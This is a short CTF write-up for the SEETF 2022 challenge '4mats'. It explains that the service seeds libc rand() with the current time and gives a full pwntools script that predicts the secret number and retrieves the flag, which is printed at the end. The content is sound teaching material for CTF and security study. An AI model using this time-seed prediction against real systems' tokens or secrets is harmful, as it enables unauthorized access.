Skip to content

Social Engineering Experts CTF 2022: 4mats

TL;DR

  • The challenge uses libc rand() to generate a secret number.
  • srand(time(NULL)) seeds the PRNG with the current timestamp.
  • Server and client time are close enough to predict the output.
  • Locally call srand(time()) and rand() to reproduce the value.
  • Submit the predicted number to get the flag.

Video Walkthrough

Social Engineering Experts CTF 2022 4mats pwn video walkthrough showing predictable rand time seed exploitation

Description

Lets get to know each other

Solution

from pwn import *
from time import time
from ctypes import CDLL

# This will automatically get context arch, bits, os etc
elf = context.binary = ELF('./vuln', checksec=False)

# Lib-C for rand()
libc = CDLL('/lib/x86_64-linux-gnu/libc.so.6')

# Create process (level used to reduce noise)
io = process(level='error')  # Local
# io = remote('fun.chall.seetf.sg', 50001)  # Remote

io.sendlineafter(b':', b'crypto')  # Submit name

io.sendlineafter(b'2. Do I know you?', b'1')  # Guess value

libc.srand(int(time()))  # Call srand() with current time as seed
guess = libc.rand() % 1000000  # Predict computers turn

io.sendlineafter(b'Guess my favourite number!', str(guess).encode())  # Submit guess

io.recvlines(2)
info(io.recv().decode())  # Print flag

Flag: SEE{4_f0r_4_f0rm4t5_0ebdc2b23c751d965866afe115f309ef}